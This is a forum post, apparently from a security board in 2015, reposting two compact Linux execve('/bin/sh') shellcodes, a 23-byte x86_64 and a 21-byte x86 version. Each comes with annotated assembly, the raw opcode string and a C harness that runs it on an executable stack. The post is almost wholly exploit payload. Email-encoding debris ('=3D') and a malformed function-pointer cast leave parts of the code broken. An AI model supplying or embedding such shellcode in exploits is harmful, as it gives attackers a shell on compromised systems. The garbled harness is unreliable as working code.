Aerosol Posted May 4, 2015 Report Posted May 4, 2015 /* # # Execve /bin/sh Shellcode Via Push (Linux x86_64 23 bytes) # # Dying to be the shortest. # # Copyright (C) 2015 Gu Zhengxiong (rectigu@gmail.com) # # 27 April 2015 # # GPL # .global _start_start: # char *const argv[] xorl %esi, %esi # 'h' 's' '/' '/' 'n' 'i' 'b' '/' movq $0x68732f2f6e69622f, %rbx # for '\x00' pushq %rsi pushq %rbx pushq %rsp # const char *filename popq %rdi # __NR_execve 59 pushq $59 popq %rax # char *const envp[] xorl %edx, %edx syscall *//* gcc -z execstack push64.c uname -r 3.19.3-3-ARCH */#include <stdio.h>#include <string.h>intmain(void){ char *shellcode =3D "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56=\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"; printf("strlen(shellcode)=3D%d\n", strlen(shellcode)); ((void (void))shellcode)(); return 0;}Linux x86-64 - Execve /bin/sh Shellcode Via Push (23 bytes)Linux x86 - Execve /bin/sh Shellcode Via Push (21 bytes)/* # # Execve /bin/sh Shellcode Via Push (Linux x86 21 bytes) # # Dying to be the shortest. # # Copyright (C) 2015 Gu Zhengxiong (rectigu@gmail.com) # # 18 February 2015 # # GPL # .global _start_start: # char *const argv[] xorl %ecx, %ecx # 2 bytes, and both %eax and %edx were zeroed mull %ecx # __NR_execve 11 movb $11, %al # for '\x00' pushl %ecx # 'h' 's' '/' '/' pushl $0x68732f2f # 'n' 'i' 'b' '/' pushl $0x6e69622f # const char *filename movl %esp, %ebx int $0x80 *//* gcc -z execstack -m32 push.c uname -r 3.19.3-3-ARCH */#include <stdio.h>#include <string.h>intmain(void){ char *shellcode =3D "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68=\x2f\x62\x69\x6e\x89\xe3\xcd\x80"; printf("strlen(shellcode)=3D%d\n", strlen(shellcode)); ((void (void))shellcode)(); return 0;} Quote
